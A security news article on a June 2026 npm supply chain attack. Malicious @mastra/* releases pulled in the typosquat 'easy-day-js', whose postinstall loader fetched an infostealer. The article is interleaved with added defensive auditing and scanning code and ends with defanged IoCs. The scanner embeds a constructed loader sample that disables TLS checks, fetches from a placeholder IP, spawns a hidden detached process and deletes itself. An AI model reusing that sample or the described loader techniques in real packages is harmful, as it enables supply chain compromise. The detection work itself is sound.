
Hackers Compromised 140+ Mastra npm Packages to Deploy Password-Stealing Malware


Jun 17, 2026

A supply chain attack has targeted the Mastra-AI npm ecosystem, with researchers from Microsoft and Socket identifying 141 compromised packages designed to silently deploy an infostealer payload on developer machines, CI/CD runners, and build environments.

The campaign, detected on June 17, 2026, used a typosquatted dependency to deliver multi-stage malware capable of stealing cryptocurrency wallet data, browser history, and sensitive credentials.

Between 01:15 and 02:36 UTC on June 17, a single npm account identified as ehindero mass-published malicious versions of 141 @mastra/* packages in a tight window.

Critically, the compromised package code itself was byte-for-byte identical to legitimate builds; the only change was a single injected dependency in each manifest:

```json
"easy-day-js": "^1.11.21"
```

easy-day-js is a deliberate typosquat of the popular dayjs library, published the day prior by a separate account (sergey2016). Version 1.11.21 was a clean copy of dayjs to establish a benign history.

Version 1.11.22, however, added a weaponized postinstall hook running node setup.cjs, executing the malicious payload automatically during npm install — before any developer imports or uses the package.
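The two tells in the paragraphs above, a dependency whose name is a near-miss of a popular library and a lifecycle script that fires during npm install, are both visible without running anything. The following is an added example (not code from the article, from Microsoft or Socket, or from the Mastra project) that audits a package-lock.json in the lockfileVersion 3 layout together with the installed packages' manifests. The lockfile, the manifests, the watch-list of popular names and the placeholder version strings are all constructed for the example; only the `easy-day-js` range and the `node setup.cjs` hook mirror what the article reports.

```javascript
// Added example, not code from the article or from the Mastra project: audit a
// package-lock.json (lockfileVersion 3 layout) plus the installed packages'
// manifests for a dependency whose name is a near-miss of a popular library and
// for lifecycle scripts that run at install time. All inputs are constructed;
// in practice you would JSON.parse package-lock.json and each
// node_modules/<name>/package.json.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Assumed watch-list of libraries worth protecting against typosquats; extend it
// with whatever your own dependency graph actually uses.
const POPULAR = ['dayjs', 'lodash', 'axios', 'express', 'moment', 'chalk'];

// Levenshtein distance, for catching one- or two-character name mutations.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
    }
  }
  return d[a.length][b.length];
}

// Drop the scope and separators so "easy-day-js" is compared as "easydayjs".
function normalizeName(name) {
  return name.replace(/^@[^/]+\//, '').replace(/[-_.]/g, '').toLowerCase();
}

// Returns the watch-listed name a package resembles, or null if it is either the
// genuine package (exact match) or nothing like any watch-listed name.
function resemblesPopular(name) {
  const n = normalizeName(name);
  if (POPULAR.includes(n)) return null;
  for (const p of POPULAR) {
    if (n.includes(p) || editDistance(n, p) <= 2) return p;
  }
  return null;
}

// Walk every installed package in the lockfile and report: a suspicious name,
// a lifecycle script in its manifest, and any suspicious name among its own
// dependencies (which tells you which package pulled the typosquat in).
function auditLockfile(lock, manifests) {
  const findings = [];
  for (const [entryPath, entry] of Object.entries(lock.packages || {})) {
    if (entryPath === '') continue; // the root project itself
    const name = entryPath.slice(entryPath.lastIndexOf('node_modules/') + 'node_modules/'.length);
    const base = { package: name, version: entry.version };
    const like = resemblesPopular(name);
    if (like) findings.push({ ...base, kind: 'typosquat-candidate', detail: `name resembles ${like}` });
    const scripts = (manifests[name] && manifests[name].scripts) || {};
    for (const hook of LIFECYCLE_HOOKS) {
      if (scripts[hook]) findings.push({ ...base, kind: 'install-script', detail: `${hook}: ${scripts[hook]}` });
    }
    for (const dep of Object.keys(entry.dependencies || {})) {
      const depLike = resemblesPopular(dep);
      if (depLike) findings.push({ ...base, kind: 'suspicious-dependency', detail: `${dep} resembles ${depLike}` });
    }
  }
  return findings;
}

// Constructed sample lockfile: version strings are placeholders, but the injected
// dependency range and the postinstall command mirror what the article reports.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', dependencies: { '@mastra/core': '*' } },
    'node_modules/@mastra/core': { version: '0.0.0-sample', dependencies: { 'easy-day-js': '^1.11.21', zod: '*' } },
    'node_modules/easy-day-js': { version: '1.11.22' },
    'node_modules/zod': { version: '0.0.0-sample' },
  },
};
const SAMPLE_MANIFESTS = {
  '@mastra/core': { scripts: { build: 'tsc' } }, // a build script does not run on install
  'easy-day-js': { scripts: { postinstall: 'node setup.cjs' } },
  zod: {},
};

for (const f of auditLockfile(SAMPLE_LOCK, SAMPLE_MANIFESTS)) {
  console.log(`${f.kind.padEnd(22)} ${f.package}@${f.version}: ${f.detail}`);
}
```

The name heuristic is a triage signal, not a verdict: a legitimate plugin such as a `dayjs-plugin-*` package will also be flagged as resembling `dayjs`, so treat "typosquat-candidate" as "look at the publisher and publication date", and treat "install-script" on a package that has no native build as the stronger signal.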

The affected packages include @mastra/core, which receives over 918,000 weekly npm downloads, giving this campaign a substantial potential blast radius.

Mastra npm Packages Compromise Chain

Stage 1 — The Loader (setup.cjs): Obfuscated using obfuscator.io, the loader disables TLS certificate verification (NODE_TLS_REJECT_UNAUTHORIZED=0), writes tracking files (~/.pkg_history, ~/.pkg_logs) to fingerprint the victim machine, fetches a second-stage payload from 23[.]254[.]164[.]92:8000/update/49890878, and spawns it as a detached, hidden background process pointing to C2 server 23[.]254[.]164[.]123:443. The loader then self-deletes to eliminate forensic traces.
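Every Stage 1 behaviour listed above leaves a textual footprint in the script before it ever runs: the environment variable that disables TLS verification, a URL with a raw IP address, a detached and hidden child process, the marker file names, a self-delete of `__filename`, and the hex-named identifiers that obfuscator.io emits. The following is an added example (not code from the article, from Microsoft or Socket, or from the Mastra project) of a static triage pass that pattern-matches an install-time script for those tells and ties each lifecycle hook in a manifest to the file it runs. It never executes the script. Both sample scripts are constructed for the example (the real setup.cjs is obfuscated and is not reproduced here), the IP in the suspicious sample is from the TEST-NET-3 documentation range, and the thresholds for the verdict are assumptions to tune.

```javascript
// Added example, not code from the article or from the Mastra project: static
// triage of an install-time script for the Stage 1 loader behaviours. Only
// pattern-matches source text; nothing here executes the script.

const LOADER_TELLS = [
  { id: 'tls-verification-disabled', re: /NODE_TLS_REJECT_UNAUTHORIZED['"]?\]?\s*=\s*['"]?0/ },
  { id: 'raw-ip-url',               re: /https?:\/\/(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?[^\s'"]*/ },
  { id: 'detached-child-process',   re: /detached\s*:\s*true/ },
  { id: 'hidden-window',            re: /windowsHide\s*:\s*true/ },
  { id: 'self-delete',              re: /unlink(?:Sync)?\s*\(\s*__filename\s*\)/ },
  { id: 'campaign-marker-file',     re: /\.pkg_(?:history|logs)\b/ },
];

function scanInstallScript(source) {
  const findings = [];
  for (const tell of LOADER_TELLS) {
    const m = source.match(tell.re);
    if (m) findings.push({ id: tell.id, evidence: m[0].slice(0, 80) });
  }
  // obfuscator.io output is full of hex-named identifiers (_0x1a2b3c) and very
  // long lines; either is a signal on a script that should be a few lines long.
  const hexIds = new Set(source.match(/_0x[0-9a-f]{4,}\b/gi) || []);
  const longestLine = source.split('\n').reduce((max, l) => Math.max(max, l.length), 0);
  if (hexIds.size >= 3 || longestLine > 2000) {
    findings.push({ id: 'obfuscated-source', evidence: `${hexIds.size} hex identifiers, longest line ${longestLine} chars` });
  }
  // Assumed policy: two independent tells block the install, one sends it to review.
  const verdict = findings.length >= 2 ? 'block' : findings.length === 1 ? 'review' : 'allow';
  return { findings, verdict };
}

// Tie each lifecycle hook in a manifest to the script file it runs and scan that
// file. `files` maps file names inside the package tarball to their contents.
function auditPackageScripts(manifest, files) {
  const report = [];
  for (const hook of ['preinstall', 'install', 'postinstall', 'prepare']) {
    const command = manifest.scripts && manifest.scripts[hook];
    if (!command) continue;
    const m = command.match(/\bnode\s+(\S+\.[cm]?js)\b/); // e.g. "node setup.cjs"
    const file = m ? m[1] : null;
    const scan = file && files[file] !== undefined
      ? scanInstallScript(files[file])
      : { findings: [], verdict: 'review' }; // hook present but target not found: still needs eyes
    report.push({ hook, command, file, ...scan });
  }
  return report;
}

// Constructed samples. The benign one is what a native-addon package typically
// does; the suspicious one strings the tells together without any real payload.
const BENIGN_POSTINSTALL = [
  "const { execSync } = require('child_process');",
  "execSync('node-gyp rebuild', { stdio: 'inherit' });",
].join('\n');

const SUSPICIOUS_POSTINSTALL = [
  "process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0';",
  "const _0x1a2b3c = require('https'), _0x4d5e6f = require('fs'), _0x7a8b9c = require('child_process');",
  "_0x4d5e6f.writeFileSync(require('os').homedir() + '/.pkg_history', String(Date.now()));",
  "_0x1a2b3c.get('https://203.0.113.10:8000/update/0000', () => {});",
  "const c = _0x7a8b9c.spawn(process.execPath, ['implant.cjs'], { detached: true, windowsHide: true, stdio: 'ignore' });",
  'c.unref();',
  '_0x4d5e6f.unlinkSync(__filename);',
].join('\n');

const SAMPLE_MANIFEST = { name: 'easy-day-js', version: '1.11.22', scripts: { postinstall: 'node setup.cjs' } };
const SAMPLE_FILES = { 'setup.cjs': SUSPICIOUS_POSTINSTALL };

for (const r of auditPackageScripts(SAMPLE_MANIFEST, SAMPLE_FILES)) {
  console.log(`${r.hook} -> ${r.file}: ${r.verdict}`, r.findings.map((f) => f.id));
}
```

Run this over the tarball contents of every package that declares a lifecycle hook before it is admitted to a private registry or cache; a legitimate native build (the benign sample) comes back "allow" while the loader pattern trips several tells at once, which is what makes the two-tell threshold workable in practice.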

Stage 2 — The Implant (protocal.cjs): A ~41 KB cross-platform Node.js tasking client, the implant installs login persistence on all major operating systems: a Windows Registry Run key value (NvmProtocal), a macOS LaunchAgent (com.nvm.protocal.plist), and a Linux systemd user unit (nvmconf.service). All three persistence mechanisms are named to look like legitimate Node.js tooling so they blend into developer environments.

Once persistent, the implant beacons to the operator’s C2 and awaits arbitrary follow-on commands. Built-in collection capabilities include inventorying 166 cryptocurrency wallet browser extensions (MetaMask, Phantom, Coinbase Wallet, Binance Wallet, TronLink, and others), exfiltrating Chrome, Edge, and Brave browser history via Node’s built-in SQLite module, and conducting host reconnaissance, including running processes and installed applications.

Mitigations

Any system that ran npm install on an affected @mastra/* version should be treated as compromised. Developers should immediately run npm ls easy-day-js (or search package-lock.json for easy-day-js) to check for exposure; any hit means the typosquat was resolved into the dependency tree. Remove the affected versions and pin to mastra@1.13.0 using lockfiles.

Remove the persistence artifacts manually on every affected platform, and rotate all credentials that may have been present in the installation environment, including npm tokens, GitHub tokens, cloud provider keys, and CI/CD secrets.

For high-value cryptocurrency wallets, migrate funds to a new wallet generated from a fresh seed phrase on a clean device.

Going forward, organizations should disable lifecycle scripts by default in CI (npm ci --ignore-scripts, or ignore-scripts=true in the project .npmrc) and re-enable them only for the specific packages that genuinely need an install-time build; enforce lockfiles by installing with npm ci rather than npm install, so an unexpected dependency fails the build instead of being resolved silently; implement package cooldown periods before newly published versions are allowed in; and monitor for outbound connections to raw IP addresses during build processes.

IoCs

Network Indicators

| Type | Indicator | Description |
| --- | --- | --- |
| IP address | 23.254.164[.]92 | Stage-2 payload delivery server |
| URL | https://23.254.164[.]92:8000/update/49890878 | Stage-2 download endpoint |
| IP address | 23.254.164[.]123 | C2 exfiltration server |
| URL | https://23.254.164[.]123:443/49890878 | C2 exfiltration endpoint |
| ASN | AS54290 | Hostwinds LLC (attacker-controlled infrastructure) |
| Domain | hwsrv-1327786.hostwindsdns[.]com | Associated attacker domain |
| Domain | hwsrv-1327785.hostwindsdns[.]com | Associated attacker domain |

Code & String Indicators

| Type | Indicator | Description |
| --- | --- | --- |
| Registry key | NvmProtocal | Windows HKCU\...\CurrentVersion\Run persistence value |
| LaunchAgent label | com.nvm.protocal | macOS login persistence agent |
| Systemd unit | nvmconf.service | Linux systemd user-level persistence unit |
| Filename | protocal.cjs | Dropped Stage-2 implant filename |
| Directory | NodePackages | Drop directory name across Windows, macOS, and Linux |
| File | .pkg_history | Loader beacon file written to temp directory |
| File | .pkg_logs | XOR-encoded campaign marker file |
| URL path | /update/49890878 | Stage-2 download path and bot identifier |


Source: CybersecurityNews.com
